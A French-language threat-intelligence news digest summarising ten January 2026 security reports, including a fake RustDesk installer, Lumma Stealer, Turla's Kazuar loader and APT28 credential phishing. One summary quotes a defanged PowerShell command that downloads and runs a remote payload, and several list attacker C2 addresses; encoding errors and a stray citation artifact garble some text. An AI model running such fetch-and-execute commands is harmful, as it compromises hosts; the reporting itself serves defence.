Faux site RustDesk diffuse le backdoor Winos4.0 via un installateur piégé

Source: Malwarebytes — Analyse d’une campagne d’usurpation de site distribuant un installateur RustDesk modifiĂ© qui dĂ©ploie le backdoor Winos4.0. Les chercheurs dĂ©crivent une imitation quasi parfaite du site officiel de RustDesk via le domaine malveillant rustdesk[.]work, conçu pour tromper les utilisateurs (SEO/branding) et leur faire tĂ©lĂ©charger un installateur qui paraĂźt lĂ©gitime. L’installateur installe le vrai RustDesk afin de conserver l’illusion, mais dĂ©ploie simultanĂ©ment un backdoor Winos4.0 offrant un accĂšs persistant aux attaquants. 🎭 ...

17 janvier 2026 Â· 3 min

Microsoft perturbe l’infrastructure RedVDS, VDS clonĂ©s utilisĂ©s pour des campagnes mondiales de phishing et BEC

Source: Microsoft Threat Intelligence — Microsoft dĂ©taille l’essor de RedVDS, un marchĂ© criminel de VDS/RDP Windows clonĂ©s, utilisĂ© par de multiples acteurs financiers (Storm‑0259, Storm‑2227, Storm‑1575, Storm‑1747, etc.) pour des opĂ©rations de phishing, account takeover et BEC Ă  l’échelle mondiale. En coopĂ©ration avec des forces de l’ordre, la Digital Crimes Unit (DCU) a rĂ©cemment facilitĂ© une perturbation de l’infrastructure RedVDS. Microsoft relie ces activitĂ©s Ă  environ 40 M$ de pertes signalĂ©es aux États‑Unis depuis mars 2025. ...

17 janvier 2026 Â· 4 min

LOTUSLITE : campagne d’espionnage ciblĂ©e via sideloading DLL, attribuĂ©e avec confiance modĂ©rĂ©e Ă  Mustang Panda

Source : Acronis Threat Research Unit (TRU). Dans un billet technique du 15 janvier 2026, Acronis TRU documente une campagne ciblĂ©e livrant un nouveau backdoor DLL, LOTUSLITE, via une archive ZIP Ă  thĂšme gĂ©opolitique liĂ©e aux relations États-Unis–Venezuela, contre des entitĂ©s gouvernementales/politiques amĂ©ricaines. Vue d’ensemble. La chaĂźne d’infection repose sur un exĂ©cutable lĂ©gitime et une DLL malveillante cachĂ©e, avec DLL sideloading pour exĂ©cuter un implant C++. LOTUSLITE communique avec un C2 Ă  IP codĂ©e en dur, offre des fonctions de tĂ©lĂ©commande (shell interactif, opĂ©rations fichiers, exfiltration basique) et met en place une persistance robuste. La campagne est jugĂ©e axĂ©e espionnage (et non financiĂšre), Ă  portĂ©e limitĂ©e mais Ă  impact potentiel Ă©levĂ© sur des cibles stratĂ©giques. ...

16 janvier 2026 Â· 4 min

Lumen/Black Lotus Labs perturbe les botnets DDoS Aisuru et Kimwolf en neutralisant 550+ serveurs C2

Selon Black Lotus Labs (Lumen Technologies), l’opĂ©rateur a observĂ© fin 2025 une croissance fulgurante du botnet Aisuru (jusqu’à >11 Tbps), puis l’apparition d’un nouveau botnet Kimwolf, alimentĂ© par l’exploitation de services de proxy rĂ©sidentiel. Lumen dĂ©crit ses actions de disruption (null-routing) ayant permis de neutraliser plus de 550 serveurs C2. — Contexte et montĂ©e en puissance — En septembre 2025, Aisuru passe d’environ 50 000 Ă  200 000 bots/jour, corrĂ©lĂ© Ă  des attaques records (>11 Tbps). Un backend C2 d’Aisuru (65.108.5[.]46) agit comme entonnoir de trafic depuis les C2 confirmĂ©s. Des connexions SSH depuis des IP canadiennes vers 194.46.59[.]169 (proxy-sdk.14emeliaterracewestroxburyma02132[.]su) suggĂšrent une interface de contrĂŽle. Le backend adopte ensuite le domaine client.14emeliaterracewestroxburyma02132[.]su. — Bifurcation vers Kimwolf — ...

16 janvier 2026 Â· 3 min

Lumma Stealer multiplie les tùches planifiées et accroßt le trafic C2 vers fileless-market[.]cc

Source: billet signĂ© par Brad Duncan (publiĂ© le 14 janvier 2026). Contexte: l’auteur documente en laboratoire un exemple d’infection Lumma Stealer prĂ©sentant un comportement post-infection inhabituel qui gĂ©nĂšre une hausse continue de trafic vers un mĂȘme domaine C2. AprĂšs l’exfiltration des donnĂ©es par Lumma Stealer, l’hĂŽte Windows infectĂ© rĂ©cupĂšre des instructions depuis un lien Pastebin (hxxps[:]//pastebin[.]com/raw/xRmmdinT) utilisĂ©es pour une infection de suivi. Le contenu Pastebin renvoie une commande PowerShell: irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex, entraĂźnant des requĂȘtes HTTPS rĂ©pĂ©tĂ©es vers hxxps[:]//fileless-market[.]cc/. ...

16 janvier 2026 Â· 2 min

Turla: analyse du loader Kazuar v3 (COM, sideloading MFC, contournements ETW/AMSI)

Dans un billet technique publiĂ© le 14 janvier 2026, l’auteur analyse la derniĂšre version du loader Kazuar v3 attribuĂ© Ă  Turla, faisant Ă©cho Ă  une campagne Ă©voquĂ©e par ESET (Ă©tiquette d’agent AGN-RR-01). Le point d’entrĂ©e est un VBScript (8RWRLT.vbs) qui crĂ©e des rĂ©pertoires sous %LOCALAPPDATA%\Programs\HP\Printer\Driver, tĂ©lĂ©charge plusieurs fichiers depuis 185.126.255[.]132, exĂ©cute un exĂ©cutable HP signĂ© (hpbprndi.exe) pour dĂ©clencher un DLL sideloading, et Ă©tablit une persistance via une clĂ© Run. Le script collecte ensuite des infos hĂŽte (OS, uptime, archi CPU, nom machine/utilisateur/domaine, liste des processus, inventaire du dossier créé) et les envoie en POST vers /requestor.php. ...

16 janvier 2026 Â· 3 min

UAT-8837 (nexus chinois) cible l’infrastructure critique nord-amĂ©ricaine et exploite un zero‑day Sitecore

Selon Cisco Talos (Threat Spotlight du 15 janv. 2026), le groupe UAT‑8837 est Ă©valuĂ© avec une confiance moyenne comme un acteur APT Ă  nexus chinois, principalement orientĂ© vers l’obtention d’accĂšs initial Ă  des organisations de grande valeur. Depuis au moins 2025, ses cibles se concentrent sur les secteurs d’infrastructure critique en AmĂ©rique du Nord. AprĂšs compromission, l’acteur dĂ©ploie surtout des outils open source pour collecter des identifiants, configurations de sĂ©curitĂ© et informations de domaine/AD, multipliant les canaux d’accĂšs. Les TTPs et l’infrastructure observĂ©es recoupent l’exploitation rĂ©cente de CVE‑2025‑53690 (zero‑day de dĂ©sĂ©rialisation ViewState dans les produits Sitecore), laissant penser qu’UAT‑8837 dispose d’exploits zero‑day. ...

16 janvier 2026 Â· 3 min

APT28 (BlueDelta) intensifie le vol d’identifiants via pages OWA/Google/VPN contre l’énergie et des think tanks

Source: SecurityAffairs, relayant un rapport de l’Insikt Group (Recorded Future). Entre fĂ©vrier et septembre 2025, le groupe liĂ© au GRU russe APT28/BlueDelta a Ă©largi ses opĂ©rations de vol d’identifiants en ciblant des personnels d’agences Ă©nergie/nuclĂ©aire en Turquie, des think tanks europĂ©ens, ainsi que des organisations en MacĂ©doine du Nord et en OuzbĂ©kistan. Les campagnes reposaient sur des fausses pages de connexion imitant Microsoft Outlook Web Access (OWA), Google et Sophos VPN, avec redirection vers les sites lĂ©gitimes aprĂšs la capture des identifiants pour rĂ©duire la dĂ©tection. Les attaquants ont privilĂ©giĂ© des infrastructures Ă  bas coĂ»t et jetables (hĂ©bergement gratuit, services de tunneling) et des leurres PDF lĂ©gitimes (publications du Gulf Research Center et de l’EcoClimate Foundation/ECCO) pour renforcer la crĂ©dibilitĂ© et contourner les contrĂŽles e-mail. ...

14 janvier 2026 Â· 3 min

Campagne caritative piégée vise des responsables ukrainiens avec le backdoor PluggyApe

Selon BleepingComputer, entre octobre et dĂ©cembre 2025, des officiels des Forces de dĂ©fense ukrainiennes ont Ă©tĂ© visĂ©s par une campagne Ă  thĂšme caritatif qui a livrĂ© un malware de type backdoor, nommĂ© PluggyApe. 🎯 Campagne PluggyApe visant les Forces de dĂ©fense ukrainiennes Entre octobre et dĂ©cembre 2025, des responsables des Forces de dĂ©fense ukrainiennes ont Ă©tĂ© ciblĂ©s par une campagne malveillante se faisant passer pour des initiatives caritatives. Selon un rapport de :contentReference[oaicite:0]{index=0}, les attaques sont attribuĂ©es avec un niveau de confiance moyen Ă  un groupe de menace russe connu sous les noms Void Blizzard et Laundry Bear. ...

14 janvier 2026 Â· 3 min

La plateforme « Penguin » vend des kits de pig‑butchering, des PII et des comptes volĂ©s

Selon GBHackers Security, l’industrialisation des escroqueries « pig‑butchering » a atteint un point critique, portĂ©e par un Ă©cosystĂšme Pig‑Butchering‑as‑a‑Service (PBaaS) qui se dĂ©veloppe en Asie du Sud‑Est. Un marchĂ© PBaaS tentaculaire propose des services complets: plates‑formes d’arnaque clĂ©s en main, identitĂ©s volĂ©es, cartes SIM pré‑enregistrĂ©es, applications mobiles, infrastructures de paiement et crĂ©ation de sociĂ©tĂ©s Ă©crans. đŸ§© Dans ce contexte, une nouvelle plateforme nommĂ©e « Penguin » commercialise des kits de pig‑butchering, des donnĂ©es personnelles (PII) et des comptes volĂ©s, facilitant l’exĂ©cution d’arnaques complexes. ...

14 janvier 2026 Â· 2 min
Derniùre mise à jour le: 23 Jan 2026 📝